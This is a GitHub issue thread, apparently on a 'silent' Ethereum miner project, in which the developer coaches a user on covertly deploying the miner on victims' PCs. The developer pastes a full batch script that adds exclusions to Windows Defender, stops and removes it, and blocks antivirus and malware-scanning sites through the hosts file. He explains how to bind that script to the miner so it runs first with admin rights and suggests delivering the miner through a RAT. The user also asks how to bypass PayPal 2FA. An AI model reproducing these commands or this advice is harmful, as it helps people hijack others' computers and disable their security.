Issue

[Milk8]

Hey its me again we spoke yesterday, I have gotten everything working and everything seems to be as they should, in nanopool the minimum payout is like 0.1 eth or 1 xmr and I want to lower that, to lower it I need a "password" in the settings tab, what would that password be or how do I set it?

[Milk8]

My pc has popped up on the dashboard

[Milk8]

so ik its working

[UnamSanctam]

Hmm, from another issue here: https://github.com/UnamSanctam/SilentETHMiner/issues/39 we theorized that on Nanopool it might have to do with if you have any other workers active and those might block it since they don't have the same email (even though they have none it might count them). When I've changed the minimum payout with the password I've never had any active workers (only miners without a worker name) so it has always worked for me because of that.

[Milk8]

So try and stop mining maybe?

[Milk8]

I only have the 1 worker actively mining that has popped up

[UnamSanctam]

Only the one with the email? Or a separate one?

[Milk8]

only the one w the email

[UnamSanctam]

Interesting, can you send the miner .exe here so I can check the connection?

[Milk8]

I ended the task and tried and it worked

[Milk8]

So thats fixed, now I just need to find somebody with a good gpu to do eth for me

[UnamSanctam]

Yeah, I might be able to do it later but I don't have a good computer available at the moment.

[Milk8]

Alright lmk

[Milk8]

I’m thinking of buying a paid silent miner that works the same as yours and wanted to ask if you thought it was worth it or if yours is basically the same thing. It has basically all the same features, though it is mining eth classic? I’m comparing this to your eth miner mostly He’s charging $120 for it and supposedly some really good spreading methods. I know for a fact it is not a scam and legit When I ask him how it’s different or better than yours/the free one, he says you cannot mine ethereum with less than 4gb cards? And he says he dosent think yours has defender killer How is in cpp and has default about the same detection as yours

Was just asking to see if you thought it was worth it and those things are important features in your experience

The issues I had before I got all fixed and it’s been working fine though

[UnamSanctam]

Well technically mine supports ETC (Ethereum Classic) as well but it seems to be bugged at the moment and I'm fixing it in the next release. And well neither ETH or ETC can be mined with less than 4 GB cards, zombie mining is basically dead so that can't be it and ETC requires a bigger DAG size than ETH but he might be doing something else.

Mine doesn't have defender killer since from personal experience it's better to just make a .bat file with all the commands that "kill" it and then bind it so that it starts before the miner preferably, or you can technically also just add it into the source. The best thing of course would to use a RAT that then is used to upload and start the miner.

My miner is also in C++ but the injector is in C# since it's more modular (not all featured have to be added into the code when built) unless you use some sort of "portable" C++ compiler. My Ethash miner is only like 1.5 months old so not all features I would like has been added yet but I'm planning on adding things in the next version like remote config support (gets connection string from online at startup), automatic miner update (meaning that the actual miner and not the injector will be updated so that you don't have to do anything), changable Idle/normal power usage (mostly only to be able to reduce fan sounds because memory clock usage goes down although of course hashrate will go down), fixing ETC and fixing a bug with the new AMD drivers.

You can use the other one if you feel like it's a worthwhile investment since it might be older and thus most bugs may be fixed and the since his cost money he might've been able to invest more time into it. Though it's hard to know exactly how much they differ since his isn't free so testing it isn't possible.

[Milk8]

Alright, ill probably stick with yours for now, any chance you have the commands that kill defender that you could paste in here and ill make a bat out of them and bind it to the miner? or anywhere that would have them? Also, since your experienced with this shit and 90% of stuff off google wont work, you know any good ways/guides on bypassing 2fa?

[UnamSanctam]

I think these are all the commands I have:

powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%'
powershell -Command Add-MpPreference -ExclusionPath '%AppData%'
powershell -Command Add-MpPreference -ExclusionPath '%Temp%'
powershell -Command Set-MpPreference -DisableArchiveScanning $true
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
powershell -Command Set-MpPreference -DisableScriptScanning $true
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
powershell -Command Set-MpPreference -DisableIOAVProtection $true
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
powershell -Command Set-MpPreference -MAPSReporting Disabled
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
powershell New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
sc config WinDefend start=disabled
sc stop WinDefend
powershell -Command Stop-Service WinDefend 
powershell -Command Set-Service WinDefend -StartupType Disabled
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
echo 127.0.0.1       www.malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"

And it depends on what 2FA, if it's the 2FA of a website then you can't really bypass it.

[Milk8]

Alright thanks and idk PayPal or something, I’ve seen people saying they have methods to bypassing it but I can’t find any or any that work I’d use a rat but my internet is fucked and just asks me to reset my password every time I try and login to the dashboard/settings panel thing so I can’t port forward Just paste that into notepad, create a batch file and bind it with my current executable? Do I have to do something so it runs first or some shit or no

[UnamSanctam]

Well most bypasses are just that the website messed up their process so you can skip a step etc, and depends on the website.

And yes just paste that into a bat file an bind it. It depends on what binder but some allows you to choose the order of execution, make them drop/execute synchronously so you can but the batch file at the top or something else.

[Milk8]

So would I want a binder that can chose order of execution to make it be a use? im using lime binder by nyan cat and dont think it has that

[Milk8]

Also would the user need to run it as admin for it too work? I tried running the bat as admin and just said it dosent have the permission to do this a bunch of times

[UnamSanctam]

Well it should be fine anyway it's just that if you can choose the order then it will "kill" Windows Defender before it drops the miner so then it wouldn't matter if the miner is detected but if it just drops both and the miner is detected it could remove it before it gets "killed".

[Milk8]

So I would then need it to execute first for it to be a use? Since thats my goal for it to bypass windows av and the miner/executable to be downloaded Can you name any binders off top of your head that has that or no

[UnamSanctam]

Yes most commands would need administrator rights. I don't really keep track of the file binders that exist anymore so I'm not even sure which ones are still popular.

[Milk8]

Alright well ill be searching for one that can make the bat file run first, if you come across one lmk, Would it be possible to add a function to the source and call it first (with cpp) to kill windows defender with those commands? Not positive how I would do it exactly using cpp and not powershell or whatever you were using in the paste a few messeges ago though

[Milk8]

Or could I call a powershell script within the cpp application or some shit

[Milk8]

Nyan cat has a bunch of windows av bypass sources but wouldnt they still need to be ran before the main executable?

[UnamSanctam]

You can call powershell scripts and all that before using C++ but that would have to be added to the binder and not the miner since if it's added to the miner source it wouldn't matter if it's run as a bound .bat instead. The NYAN-CAT Windows Defender bypasses I believe are pretty much the same as the commands I sent you and yes it would still have to be run first. After looking through the source I believe this executes them in order https://github.com/Paskowsky/Dream-AIO.

[Milk8]

Alright ive debugged that and got it running but how the fuck am I supposed to add files to it to bind/ I cant drag them in and no box to type or browse files

[UnamSanctam]

Right click?

[Milk8]

Ive got it debugged but how am I supposed to put files into it to bind, I cant drag, paste, and theres no box to browse files

[Milk8]

oh sorry didnt see that msg 1 sec ill try

[Milk8]

Alright yea that was the problem im on a macbook with windows on it and it wont let me right click or scroll so its not my first thing to try, is your bat file the same or better than nyans you think? its more ud I assume

[Milk8]

Alright to make it run first what I should I do? theres an execute and drop only option

[UnamSanctam]

From what I see in the code it will execute them in the order you put them in, so the program at the top will execute first. NYAN-CATs script should be similar to mine but I'm pretty sure mine contains some more commands.

[Milk8]

So the one I put in first will execute last? or vise versa

[Milk8]

And then it says "drop options" and folders to drop it too, Should I worry about that? or is that useless because the miner is already dropping or going to the folder I want and everything else is just things that need to be ran once and they dont matter from then on

[UnamSanctam]

The one you put in first will execute first I believe, you can test it by creating two .bat files that each display a message and you would see which message comes up first.

You can probably leave the drop options as they are if you add an exclusion path command to the current folder as well or choose a drop folder like Temp or AppData.

[Milk8]

What would I put in notepad for it to display what I type? it just opens for a milisecond and closes normally just making words a bat file in notepad

[UnamSanctam]

pause in the last line but you could maybe use something like: PowerShell -Command "Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('MESSAGE HERE')" to show a textbox.

[Milk8]

Alright I got it